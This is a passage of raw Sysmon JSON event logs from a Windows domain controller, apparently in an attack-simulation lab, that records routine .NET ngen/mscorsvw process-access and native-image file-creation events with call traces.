C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.778","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.778\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.778","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.778\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.778","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010B91B0F00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.809\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010177D1000}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.809","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010177D1000}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010177D1000}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010177D1000}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010177D1000}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010177D1000}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:36.137\r\nProcessGuid: {A837DB8D-04C7-5F25-0000-0010177D1000}\r\nProcessId: 5076\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13d4-0\\System.DirectoryServices.Protocols.dll\r\nCreationUtcTime: 2020-08-01 05:59:36.137","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:36.137","ProcessGuid":"{A837DB8D-04C7-5F25-0000-0010177D1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13d4-0\\System.DirectoryServices.Protocols.dll","CreationUtcTime":"2020-08-01 05:59:36.137","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.168\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00100ECA0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.168","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00100ECA0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:36.168\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00100ECA0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:36.168","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00100ECA0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
